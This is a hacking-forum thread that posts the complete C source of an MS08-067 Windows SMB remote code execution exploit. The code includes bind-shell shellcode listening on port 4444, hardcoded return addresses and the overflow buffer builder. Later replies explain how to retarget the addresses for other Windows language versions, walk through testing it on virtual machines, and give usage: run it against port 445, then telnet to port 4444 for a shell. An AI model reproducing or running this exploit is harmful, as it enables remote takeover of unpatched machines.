20 replies to this topic

[nine below zero]

what port does this run on..

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <io.h>
#include <fcntl.h>
#include <memory.h>
#include <wchar.h>
#include "srvsvc.h"
#include "srvsvc_c.c"
#include "mem.h"


#pragma comment(lib,"ws2_32")
#pragma comment(lib,"mpr")
#pragma comment(lib,"rpcrt4.lib")
#pragma comment(lib,"MSVCRT.LIB")

DWORD dwRetAddr = 0x7ffa0eb8;
DWORD dwJmpAddr = 0x7ffa0eb7;

/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub [url="http://metasploit.com"]http://metasploit.com[/url] */
unsigned char sc[] =
"\x83\xEC\x70" // sub esp, 0x70
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad"
"\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5"
"\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1"
"\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3"
"\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62"
"\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1"
"\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1"
"\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a"
"\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a"
"\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48"
"\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19"
"\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab"
"\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22"
"\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03"
"\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d"
"\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a"
"\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67"
"\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5"
"\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b"
"\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a"
"\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a"
"\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";


int MakeBuff(char *Buff,int BufLen);
void Usage(char *ProgName);
int WaitExit();

#define CN 0
#define TW 1

void main(int argc, char *argv[])
{
 NETRESOURCE lpNetResource;
 char Username[256] = {0};
 char Password[256] = {0};
 DWORD Ret = 0;
 RPC_STATUS status;
 unsigned char * pszUuid = NULL;
 unsigned char * pszProtocolSequence = "ncacn_np";
 unsigned char * pszNetworkAddress = "";
 unsigned char pszEndpoint[100] = "[url="file://\\pipe\\browser"]\\pipe\\browser[/url]";
 unsigned char * pszOptions = NULL;
 unsigned char * pszStringBinding = NULL;

 char Server[256] = {0};
 char RemoteName[256] = {0};
 char Buff[0x700];
 char Buff2[1000] = {0};
 char *pBuff2 = (char *)&Buff2;
 char Buff3[100] = {0};
 int  BufLen = 0;
// int  i;
 int  ForceAttack = 0;
 int  AntiDEP = 0;

 int  nLanguage = 0;
 DWORD dwID = 0;

 if(argc != 2)
 {
  Usage(argv[0]);
  return;
 }

 strcpy(Server,argv[1]);
 sprintf(RemoteName,"[url=""]\\\\%s\\IPC$",Server[/url]);
 pszNetworkAddress = Server;


 if(strlen(Server) == 0)
 {
  Usage(argv[0]);
  return;
 }

 printf("\nMS08-067 Exploit for CN by [email="EMM@ph4nt0m.org\n\n"]EMM@ph4nt0m.org\n\n[/email]");

 lpNetResource.dwScope=RESOURCE_CONNECTED;
 lpNetResource.dwType =RESOURCETYPE_DISK;
 lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;
 lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;
 lpNetResource.lpLocalName=NULL;
 lpNetResource.lpRemoteName = RemoteName;
 lpNetResource.lpComment=NULL;
 lpNetResource.lpProvider=NULL;

 Ret = WNetAddConnection2(&lpNetResource,Username,Password,CONNECT_UPDATE_PROFILE);
 if(Ret != NO_ERROR)
 {
  printf("Make SMB Connection error:%d\n",GetLastError());
  return;
 }
 
 printf("SMB Connect OK!\n");

 status = RpcStringBindingCompose(pszUuid,
		 pszProtocolSequence,
		 pszNetworkAddress,
		 pszEndpoint,
		 pszOptions,
		 &pszStringBinding);
 if(status != RPC_S_OK)
 {
  return;
 }
 status = RpcBindingFromStringBinding(pszStringBinding,&srvsvc__MIDL_AutoBindHandle);
 if(status != RPC_S_OK)
 {
  return;
 }


   RpcTryExcept
	{

  func23(L"ph4nt0m",(wchar_t *)"\x53\x00\x56\x89\x56\x89\x56\x89\x56\x89",(wchar_t *)"\x4D\x00\x56\x89\x56\x89",4,0);


  memset(Buff,0,sizeof(Buff));
  BufLen = MakeBuff(Buff,sizeof(Buff));

  CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)WaitExit,(LPVOID)NULL,0,&dwID);
  (DWORD)*(DWORD *)Buff3 = 1;
  func1f(L"EMM!",(wchar_t *)Buff,Buff2,1000,L"",(DWORD *)Buff3,1);

	}
	RpcExcept ( 1 )
	{
		status = RpcExceptionCode();
  if(status == 1726)
  {
  }
  else
  {
   printf("RpcExceptionCode() = %u\r\n", status );
   return;
  }
	}
	RpcEndExcept
//*/
 printf("Maybe Patched!\n");


	RpcStringFree( &pszStringBinding );
	RpcBindingFree( &srvsvc__MIDL_AutoBindHandle );
 return;
}


#define JMPPOINT "B041"
int MakeBuff(char *Buff, int BufLen)
{
 int len = 0;
 char tmp[5] = {0};
 int i;

 for(i = 0; i < BufLen/4; i++)
 {
  memset(tmp,0,4);
  sprintf(tmp,"B%03d",i);
//*  
  if(memcmp(tmp,JMPPOINT,4) == 0)
  {
   break;
  }
//*/
  memcpy(Buff + len,tmp,4);
  len += 4;
 }

 memcpy(Buff,L".\\\\a\\..\\..\\NN",13*2);

 for(i = 0; i < 6; i++)
 {
  memcpy(Buff + len,&dwRetAddr,4);
  len += 4;
 }
 
 memcpy(Buff + len,&dwJmpAddr,4);
 len += 4;
 memset(Buff + len,0x48,0x4);
 len += 4;

 memcpy(Buff + len,sc,sizeof(sc) - 1);
 len += sizeof(sc) - 1;

 memcpy(Buff + len,"EMM!",4);
 len += 4;

 memset(Buff + 0x206 * 2,0,2);
 return len;
}

void Usage(char *ProgName)
{
 printf("\n MS08-067 Exploit for CN by [email="EMM@ph4nt0m.org\n\n"]EMM@ph4nt0m.org\n\n[/email] %s <Server>\n\n",ProgName);
 return;
}

int WaitExit()
{
 Sleep(1000 * 5);
 printf("Send Payload Over!\n");
 ExitProcess(0);
 return 0;
}

[Glyph]

If you don't know, don't mess with it.
One would think that with all the press you would at least read up before going after source code.

[illwill]

captain obvious try doing a search for "port"

[nine below zero]

you ask for a bit of help. and all you get are twaty replys from you guys. illwill i did look at a port list and glyph if you think you know what it is say.

[slb33]

You obviously didn't do a very good job of looking!
For some reason your attitude makes me think you might not last long here!

But, I'm going to give you a little hint anyway since you seem to be such a nice guy

Check this page out, you might get the info you need!

hxxp://blogs.securiteam.com/index.php/archives/1150

Stay out of trouble!

[espey]

hi.

I hava a question. its possible to change manualy

DWORD dwRetAddr = 0x7ffa0eb8;
DWORD dwJmpAddr = 0x7ffa0eb7

adresses to other languages ?

[Paul]

You can change this exploit to make it work with any language. Just change the values, though I'm not sure which. If you know a little of asm and C++ you can make it working, though I hope someone doesn't post a all univ one for your own sake :/

[nine below zero]

New Trial holes] Ms08-067 Exp detailed testing process (graphic)

To test this, I installed the three virtual machine. 。 . 。 . 一两个XP一个2003，终于弄明白都需要哪些必要条件了，写出来和大家分享，希望对离成功还差一步的同学们有所帮助，感谢幻影的牛人放出MS08-067的Exp，自由，共享。 12, 2003 an XP, need to finally find out what the necessary conditions, write to share with you the hope of success is still a step away from the students help, thanks to Phantom of the cattle were released MS08-067 of the Exp, free Share.

经过N+1次的测试之后发现，本机和目标机必须要开启以下服务，否则就算对方没有打补丁也会失败。 After N +1 times after the test found that the local machine and objectives must be to open the following services, or even if the other side patch will not fail.
Server、Computer Browser、Workstation。 Server, Computer Browser, Workstation.
下面测试开始（和我局域网的同学们的电脑我都会第一时间叫他们打补丁。。。这次没法儿用他们的电脑测试了，我只好装虚拟机测试） The beginning of the following test (and my fellow students of the local area network computer will be the first time I ask them to patch... The child can use their computers tested, I had no choice but to test virtual machine installed)
在cmd下直接运行MS08-067.exe 出现命令帮助 Cmd in the run directly under the MS08-067.exe order appears to help
MS08-067.exe <Server> MS08-067.exe <Server>
很简单，只需要输入MS08-067.exe IP 就可以了。 Very simple, just enter MS08-067.exe IP it.
MS08-067 Exploit for CN by EMM@ph4nt0m.org MS08-067 Exploit for CN by EMM@ph4nt0m.org
目标机为虚拟机（IP 192.168.1.2），攻击者为本机(IP 192.168.1.188) The target machine to virtual machine (IP 192.168.1.2), attackers machine-based (IP 192.168.1.188)
虚拟机端口开放如下： Virtual Machine port open as follows:

[GhostShell]

Nothing to do now but wait for perfection,
and be ready hehe.
I'm so excited!
lolz

^^gS

[GroovyDude]

what port does this run on..

Here's your sign...

[GhostShell]

what port does this run on..

Here's your sign...

Sign of skidz0r?
That can't wait to do dirty illict thing with boxes :shrugged: I know!
Every time a new sploit hits we get flooded with no offense to zero9 or whatever your name is, idiots!
why cant it just be the old schoolers that waited patiently for this not these idiots who want to ruin the fun and fckn make a bot net or something stupid or make money or write a god damn w0rm.

Love, gS@gSo

[Edu]

what port does this run on..

Here's your sign...

Sign of skidz0r?
That can't wait to do dirty illict thing with boxes :shrugged: I know!
Every time a new sploit hits we get flooded with no offense to zero9 or whatever your name is, idiots!
why cant it just be the old schoolers that waited patiently for this not these idiots who want to ruin the fun and fckn make a bot net or something stupid or make money or write a god damn w0rm.

Love, gS@gSo

you sir complain of something that does happen at times, but your latest posts aren´t helping anything, and people could possibly complain of them, so maybe you should think a bit more about what you post before doing it and we dont want a flamewar starting here, nor we will let that happen. I have my eye on you sir, for the moment.

[Romualdo]

MS08-067.exe IP (with port 445 open)

telnet IP 4444

[GhostShell]

what port does this run on..

Here's your sign...

Sign of skidz0r?
That can't wait to do dirty illict thing with boxes :shrugged: I know!
Every time a new sploit hits we get flooded with no offense to zero9 or whatever your name is, idiots!
why cant it just be the old schoolers that waited patiently for this not these idiots who want to ruin the fun and fckn make a bot net or something stupid or make money or write a god damn w0rm.

Love, gS@gSo

you sir complain of something that does happen at times, but your latest posts aren´t helping anything, and people could possibly complain of them, so maybe you should think a bit more about what you post before doing it and we dont want a flamewar starting here, nor we will let that happen. I have my eye on you sir, for the moment.

Sorry I was in a bad mood at the moment of that post. And which latest posts were you referring to? I guess Ill go back to what I was doing before being quiet and reading and not being active I just thought It would be fun to put a word in or two Ill be quiet from now on promise, you wont hear me again.

[Edu]

I am not saying dont post man. I am just suggesting u to think of what u post cause it could result in a flame war, etc. I refer to the posts in this topic specifically btw.